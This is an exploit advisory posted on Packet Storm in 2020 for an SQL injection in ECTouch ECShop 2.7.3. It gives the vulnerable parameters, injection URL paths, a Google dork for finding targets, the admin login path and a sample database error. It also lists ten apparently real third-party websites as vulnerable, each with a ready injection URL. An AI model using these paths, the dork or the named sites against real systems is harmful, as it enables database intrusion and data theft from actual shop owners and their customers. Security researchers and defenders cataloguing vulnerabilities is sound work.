exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

ECTouch ECShop 2.7.3 SQL Injection

ECTouch ECShop 2.7.3 SQL Injection
Posted Jan 22, 2020
Authored by KingSkrupellos

ECTouch ECShop version 2.7.3 suffers from a remote SQL injection vulnerability.

tags | exploit, remote, sql injection
SHA-256 | 8dd98cffff4151d809d69d971abf6959bcb91e00f75bdc195ac1fd4587cc5cac

ECTouch ECShop 2.7.3 SQL Injection

Change Mirror Download
###################################################################

# Exploit Title : ECTouch ECShop v2.7.3 SQL Injection
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 22/01/2020
# Vendor Homepage : ecshop.com - ectouch.cn
# Software Download Link : ecshop.com/download
# Software Affected Versions : 1.0 and 2.7.3
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# Google Dorks : inurl:/mobile/index.php?m=default site:cn
# Vulnerability Type : CWE-89 [ Improper Neutralization of
Special Elements used in an SQL Command ('SQL Injection') ]
# PacketStormSecurity : packetstormsecurity.com/files/authors/13968
# CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
# Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos

###################################################################

# Impact :
***********
ECTouch ECShop v2.7.3 is prone to an SQL-injection vulnerability because
it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or
modify data, or exploit latent vulnerabilities in the underlying database.
A remote attacker can send a specially crafted request to the vulnerable application and
execute arbitrary SQL commands in application`s database. Further exploitation of this
vulnerability may result in unauthorized data manipulation.
An attacker can exploit this issue using a browser or with any SQL Injector Tool.

###################################################################

# Administrator Panel Login Path :
******************************
/mobile/user.php?act=login

# Vulnerable SQL Injection Parameters :
*************************************
&id=
&brand=
&price_min=
&price_max=
&filter_attr=
&page=

# SQL Injection Exploit :
**********************
/mobile/index.php?m=default&c=category&a=asynclist&id=[SQL Injection]

/mobile/index.php?m=default&c=category&a=asynclist&id=[ID-NUMBER]&brand=[SQL Injection]

/mobile/index.php?m=default&c=category&a=asynclist&id=[ID-NUMBER]&brand=[ID-NUMBER]&price_min=[SQL Injection]

/mobile/index.php?m=default&c=category&a=asynclist&id=[ID-NUMBER]&brand=[ID-NUMBER]&price_min=[ID-NUMBER]&price_max=[SQL Injection]

/mobile/index.php?m=default&c=category&a=asynclist&id=[ID-NUMBER]&brand=[ID-NUMBER]&price_min=[ID-NUMBER]&price_max=[ID-NUMBER]&filter_attr=[SQL Injection]

/mobile/index.php?m=default&c=category&a=asynclist&id=[ID-NUMBER]&brand=[ID-NUMBER]&price_min=[ID-NUMBER]&price_max=[ID-NUMBER]&filter_attr=[ID-NUMBER]&page=[SQL Injection]&sort=sales_volume&order=ASC

###################################################################

# Example Vulnerable Sites :
*************************
[+] zhijianshi.cn/mobile/index.php?m=default&c=category&a=asynclist&id=1153&brand=0&price_min=0&price_max=0&filter_attr=1%27

[+] as66.cn/mobile/index.php?m=default&c=category&a=asynclist&id=1153&brand=0&price_min=0&price_max=0&filter_attr=1%27

[+] xingsom.net/shop/mobile/index.php?m=default&c=category&a=asynclist&id=1153&brand=0&price_min=0&price_max=0&filter_attr=1%27

[+] daqiunici.com/mobile/index.php?m=default&c=category&a=asynclist&id=1153&brand=0&price_min=0&price_max=0&filter_attr=1%27

[+] 95isee.com/mobile/index.php?m=default&c=category&a=asynclist&id=1153&brand=0&price_min=0&price_max=0&filter_attr=1%27

[+] ctsports.com.cn/mobile/index.php?m=default&c=category&a=asynclist&id=1153&brand=0&price_min=0&price_max=0&filter_attr=1%27

[+] guojiseka.cn/mobile/index.php?m=default&c=category&a=asynclist&id=1153&brand=0&price_min=0&price_max=0&filter_attr=1%27

[+] xiuyoupu.com/mobile/index.php?m=default&c=category&a=asynclist&id=1153&brand=0&price_min=0&price_max=0&filter_attr=1%27

[+] rebeccafashion.cn/mobile/index.php?m=default&c=category&a=asynclist&id=1153&brand=0&price_min=0&price_max=0&filter_attr=1%27

[+] xienson.cn/mobile/index.php?m=default&c=category&a=asynclist&id=69&brand=0&price_min=0&price_max=0&filter_attr=0&page=1%27&sort=sales_volume&order=ASC

###################################################################

# Example SQL Database Error :
****************************
MySQL Query Error
Warning: Division by zero in C:\web\WWW\xiuyoupu\mobile\include
\apps\default\controller\CategoryController.class.php on line 100
SQL: SELECT g.goods_id, g.goods_name, g.goods_name_style, g.market_price,
g.is_new, g.is_best, g.is_hot,g.brand_id, g.shop_price AS org_price, g.seller_credit,
g.best_rating,g.cat_id,g.admin_user_id,g.store_card6,g.store_card7,g.store_card8,
g.grade,g.enter_time,g.kejara,g.trademark_type,g.grade,g.mail_type,g.cash_deposit,
IFNULL(mp.user_price, g.shop_price) AS shop_price, g.promote_price, g.goods_type,
g.promote_start_date, g.promote_end_date, g.goods_brief, g.goods_thumb , g.goods_img,
xl.sales_volume FROM ecs_goods AS g LEFT JOIN ecs_touch_goods AS xl ON
g.goods_id=xl.goods_id LEFT JOIN ecs_member_price AS mp ON mp.goods_id =
g.goods_id AND mp.user_rank = '0' WHERE g.is_on_sale = 1 AND g.is_alone_sale =
1 AND g.goods_number<>0 AND g.is_delete = 0 AND (g.cat_id IN ('1153')
OR g.goods_id IN ('') ) ORDER BY goods_id DESC LIMIT -0 ,
You have an error in your SQL syntax; check the manual that corresponds
to your MySQL server version for the right syntax to use near '-0 ,' at line 1

###################################################################

# Discovered By Hacker KingSkrupellos from Cyberizm.Org Digital Security Team

###################################################################
Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    14 Files
  • 12
    Nov 12th
    20 Files
  • 13
    Nov 13th
    0 Files
  • 14
    Nov 14th
    0 Files
  • 15
    Nov 15th
    0 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    0 Files
  • 19
    Nov 19th
    0 Files
  • 20
    Nov 20th
    0 Files
  • 21
    Nov 21st
    0 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close